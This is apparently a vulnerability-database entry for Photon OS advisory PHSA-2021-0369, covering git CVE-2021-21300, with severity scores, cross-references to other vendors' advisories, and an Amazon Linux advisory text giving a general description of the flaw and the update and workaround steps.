Important Photon OS Security Update - PHSA-2021-0369

2021-03-11T00:00:00

Description

Updates of ['git'] packages of Photon OS have been released.

Affected Package

OS	OS Version	Package Name	Package Version
Photon	1.0	git	2.23.3-2.ph1
Photon	1.0	git-lang	2.23.3-2.ph1

{"id": "PHSA-2021-0369", "vendorId": null, "type": "photon", "bulletinFamily": "unix", "title": "Important Photon OS Security Update - PHSA-2021-0369", "description": "Updates of ['git'] packages of Photon OS have been released.\n", "published": "2021-03-11T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 5.1}, "severity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-369", "reporter": "Photon", "references": [], "cvelist": ["CVE-2021-21300"], "immutableFields": [], "lastseen": "2023-04-01T18:45:13", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-21300"]}, {"type": "altlinux", "idList": ["E128EC2FAE528E202A089B3D6DB390FA"]}, {"type": "amazon", "idList": ["ALAS-2021-1490", "ALAS2-2021-1621"]}, {"type": "apple", "idList": ["APPLE:A0585C210067431EE8E00DA73CF0ED0F"]}, {"type": "archlinux", "idList": ["ASA-202103-3"]}, {"type": "attackerkb", "idList": ["AKB:3A3E50F2-FC37-42B7-AC9E-A373A168289D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-1343"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:26E443794B9C5844AA3512A6DC376DA3"]}, {"type": "cve", "idList": ["CVE-2021-21300"]}, {"type": "debian", "idList": ["DEBIAN:DLA-3145-1:98F78"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21300"]}, {"type": "fedora", "idList": ["FEDORA:1FF2630A3E60", "FEDORA:279513049383", "FEDORA:5BF0F30E1976"]}, {"type": "gentoo", "idList": ["GLSA-202104-01"]}, {"type": "github", "idList": ["GITHUB:F5B0002563990B2F3D01561EE569B054"]}, {"type": "githubexploit", "idList": ["64104E19-E624-5A95-9E5F-C96A06DA52A2", "B5AB6C8C-D00B-5759-B642-2F4E5EAF24BB", "B741CE6E-A965-5375-BA57-8CC74C32B094"]}, {"type": "ibm", "idList": ["73690528940837ED9F5E1C09C8B135FBAA2F8C5262BEEE48AC6C886A7FCEAFB0"]}, {"type": "kaspersky", "idList": ["KLA12110"]}, {"type": "mageia", "idList": ["MGASA-2021-0137"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21300"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1621.NASL", "ALA_ALAS-2021-1490.NASL", "DEBIAN_DLA-3145.NASL", "EULEROS_SA-2021-1870.NASL", "EULEROS_SA-2021-1897.NASL", "EULEROS_SA-2021-1923.NASL", "EULEROS_SA-2021-1944.NASL", "EULEROS_SA-2021-1998.NASL", "EULEROS_SA-2021-2033.NASL", "EULEROS_SA-2021-2887.NASL", "FEDORA_2021-63FCBD126E.NASL", "FEDORA_2021-FFD0B2108D.NASL", "GENTOO_GLSA-202104-01.NASL", "OPENSUSE-2021-2555.NASL", "OPENSUSE-2021-405.NASL", "PHOTONOS_PHSA-2021-1_0-0369_GIT.NASL", "PHOTONOS_PHSA-2021-2_0-0327_GIT.NASL", "PHOTONOS_PHSA-2021-3_0-0207_GIT.NASL", "PHOTONOS_PHSA-2021-4_0-0004_GIT.NASL", "SLACKWARE_SSA_2021-070-01.NASL", "SMB_NT_MS21_MAR_VISUAL_STUDIO.NASL", "SUSE_SU-2021-0756-1.NASL", "SUSE_SU-2021-0757-1.NASL", "SUSE_SU-2021-2555-1.NASL", "UBUNTU_USN-4761-1.NASL"]}, {"type": "osv", "idList": ["OSV:CVE-2021-21300", "OSV:DLA-3145-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163978"]}, {"type": "photon", "idList": ["PHSA-2021-0004", "PHSA-2021-0207", "PHSA-2021-0327", "PHSA-2021-1.0-0369", "PHSA-2021-2.0-0323", "PHSA-2021-2.0-0327", "PHSA-2021-3.0-0207", "PHSA-2021-4.0-0004"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:87258C1DADE2252F01C88F01B6B88F78", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21300"]}, {"type": "seebug", "idList": ["SSV:99155"]}, {"type": "slackware", "idList": ["SSA-2021-070-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0405-1", "OPENSUSE-SU-2021:2555-1"]}, {"type": "ubuntu", "idList": ["USN-4761-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21300"]}, {"type": "veracode", "idList": ["VERACODE:29656"]}, {"type": "zdt", "idList": ["1337DAY-ID-36691"]}]}, "score": {"value": 1.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2021-1523"]}, {"type": "archlinux", "idList": ["ASA-202103-3", "ASA-202107-70"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:26E443794B9C5844AA3512A6DC376DA3"]}, {"type": "cve", "idList": ["CVE-2021-21300", "CVE-2021-32760"]}, {"type": "fedora", "idList": ["FEDORA:1FF2630A3E60", "FEDORA:279513049383", "FEDORA:5BF0F30E1976"]}, {"type": "github", "idList": ["GHSA-C72P-9XMJ-RX3W", "GITHUB:F5B0002563990B2F3D01561EE569B054"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21300"]}, {"type": "nessus", "idList": ["ALA_ALAS-2021-1523.NASL", "FEDORA_2021-63FCBD126E.NASL", "FEDORA_2021-FFD0B2108D.NASL", "OPENSUSE-2021-1081.NASL", "OPENSUSE-2021-2412.NASL", "OPENSUSE-2021-405.NASL", "ORACLELINUX_ELSA-2021-9373.NASL", "PHOTONOS_PHSA-2021-1_0-0369_GIT.NASL", "PHOTONOS_PHSA-2021-1_0-0414_DOCKER.NASL", "PHOTONOS_PHSA-2021-2_0-0327_GIT.NASL", "PHOTONOS_PHSA-2021-2_0-0369_CONTAINERD.NASL", "PHOTONOS_PHSA-2021-3_0-0207_GIT.NASL", "PHOTONOS_PHSA-2021-3_0-0269_CONTAINERD.NASL", "PHOTONOS_PHSA-2021-4_0-0004_GIT.NASL", "PHOTONOS_PHSA-2021-4_0-0064_CONTAINERD.NASL", "SLACKWARE_SSA_2021-070-01.NASL", "SMB_NT_MS21_MAR_VISUAL_STUDIO.NASL", "SUSE_SU-2021-0756-1.NASL", "SUSE_SU-2021-0757-1.NASL", "SUSE_SU-2021-2412-1.NASL", "SUSE_SU-2021-2413-1.NASL", "UBUNTU_USN-4761-1.NASL", "UBUNTU_USN-5012-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-15790", "ELSA-2021-9373"]}, {"type": "photon", "idList": ["PHSA-2021-1.0-0414", "PHSA-2021-2.0-0369", "PHSA-2021-3.0-0269", "PHSA-2021-4.0-0064"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "slackware", "idList": ["SSA-2021-070-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1081-1", "OPENSUSE-SU-2021:2412-1"]}, {"type": "ubuntu", "idList": ["USN-4761-1", "USN-5012-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-32760"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-32760", "epss": 0.0012, "percentile": 0.44594, "modified": "2023-03-31"}], "vulnersScore": 1.7}, "_state": {"dependencies": 1680374786, "score": 0, "epss": 1680374359}, "_internal": {"score_hash": "6f52c8dd2ca4593732804c929b860300"}, "affectedPackage": [{"OS": "Photon", "OSVersion": "1.0", "arch": "x86_64", "packageVersion": "2.23.3-2.ph1", "packageFilename": "git-2.23.3-2.ph1.x86_64.rpm", "operator": "lt", "packageName": "git"}, {"OS": "Photon", "OSVersion": "1.0", "arch": "x86_64", "packageVersion": "2.23.3-2.ph1", "packageFilename": "git-lang-2.23.3-2.ph1.x86_64.rpm", "operator": "lt", "packageName": "git-lang"}], "vendorCvss": {"severity": "important"}}

{"photon": [{"lastseen": "2023-02-10T03:20:22", "description": "Updates of ['git'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0004", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-12T00:00:00", "id": "PHSA-2021-4.0-0004", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-4", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-03T08:47:17", "description": "An update of {'git'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2021-1.0-0369", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-11T00:00:00", "id": "PHSA-2021-1.0-0369", "href": "https://github.com/vmware/photon/wiki/Security-Updates-1.0-369", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T18:57:56", "description": "Updates of ['git'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0004", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-12T00:00:00", "id": "PHSA-2021-0004", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-4", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-03T15:01:34", "description": "An update of {'python3', 'git'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2021-2.0-0327", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-23336"], "modified": "2021-03-11T00:00:00", "id": "PHSA-2021-2.0-0327", "href": "https://github.com/vmware/photon/wiki/Security-Updates-2-327", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-03T20:57:08", "description": "An update of {'python3', 'git'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2021-2.0-0323", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-23336"], "modified": "2021-03-03T00:00:00", "id": "PHSA-2021-2.0-0323", "href": "https://github.com/vmware/photon/wiki/Security-Updates-2-327", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-09T02:36:17", "description": "Updates of ['python3', 'git'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0327", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-23336"], "modified": "2021-03-11T00:00:00", "id": "PHSA-2021-0327", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-327", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T18:44:13", "description": "Updates of ['bindutils', 'git'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0207", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8625", "CVE-2021-21300"], "modified": "2021-03-15T00:00:00", "id": "PHSA-2021-0207", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-207", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-01T05:37:20", "description": "Updates of ['git', 'bindutils'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0207", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8625", "CVE-2021-21300"], "modified": "2021-03-15T00:00:00", "id": "PHSA-2021-3.0-0207", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-207", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:20:23", "description": "# CVE-2021-21300\n\njust clo...", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T02:57:11", "type": "githubexploit", "title": "Exploit for Link Following in Git-Scm Git", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-10-17T01:05:52", "id": "B5AB6C8C-D00B-5759-B642-2F4E5EAF24BB", "href": "", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:30", "description": "# CVE-2021-21300\n\ngit\u591a\u4e2a\u7248\u672c\u4e2d\uff0c\u5bf9\u7b26\u53f7\u94fe\u63a5\u5904\u7406\u4e0d\u4e25\u683c\u3002\u5728\u5927\u5c0f\u5199\u654f\u611f\uff08\u4f8b\u5982Linux\uff09\u7684\u6587\u4ef6\u7cfb\u7edf\u4e0a\u4f20\u6587\u4ef6\u5230g...", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-06T01:44:17", "type": "githubexploit", "title": "Exploit for Link Following in Git-Scm Git", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-04-06T02:14:31", "id": "B741CE6E-A965-5375-BA57-8CC74C32B094", "href": "", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:37", "description": "CVE-2021-21300\n\nRun the follow...", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-14T09:54:08", "type": "githubexploit", "title": "Exploit for Link Following in Git-Scm Git", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-05-14T13:32:39", "id": "64104E19-E624-5A95-9E5F-C96A06DA52A2", "href": "", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "amazon": [{"lastseen": "2023-02-08T17:09:32", "description": "**Issue Overview:**\n\nGit is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\n \n**Affected Packages:** \n\n\ngit\n\n \n**Issue Correction:** \nRun _yum update git_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 git-core-2.18.5-2.73.amzn1.i686 \n \u00a0\u00a0\u00a0 git-instaweb-2.18.5-2.73.amzn1.i686 \n \u00a0\u00a0\u00a0 git-debuginfo-2.18.5-2.73.amzn1.i686 \n \u00a0\u00a0\u00a0 git-subtree-2.18.5-2.73.amzn1.i686 \n \u00a0\u00a0\u00a0 git-daemon-2.18.5-2.73.amzn1.i686 \n \u00a0\u00a0\u00a0 git-svn-2.18.5-2.73.amzn1.i686 \n \u00a0\u00a0\u00a0 git-2.18.5-2.73.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 perl-Git-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-p4-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 perl-Git-SVN-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-cvs-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-email-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-hg-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 emacs-git-el-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 gitweb-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-bzr-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-all-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 emacs-git-2.18.5-2.73.amzn1.noarch \n \u00a0\u00a0\u00a0 git-core-doc-2.18.5-2.73.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 git-2.18.5-2.73.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 git-subtree-2.18.5-2.73.amzn1.x86_64 \n \u00a0\u00a0\u00a0 git-2.18.5-2.73.amzn1.x86_64 \n \u00a0\u00a0\u00a0 git-core-2.18.5-2.73.amzn1.x86_64 \n \u00a0\u00a0\u00a0 git-debuginfo-2.18.5-2.73.amzn1.x86_64 \n \u00a0\u00a0\u00a0 git-daemon-2.18.5-2.73.amzn1.x86_64 \n \u00a0\u00a0\u00a0 git-svn-2.18.5-2.73.amzn1.x86_64 \n 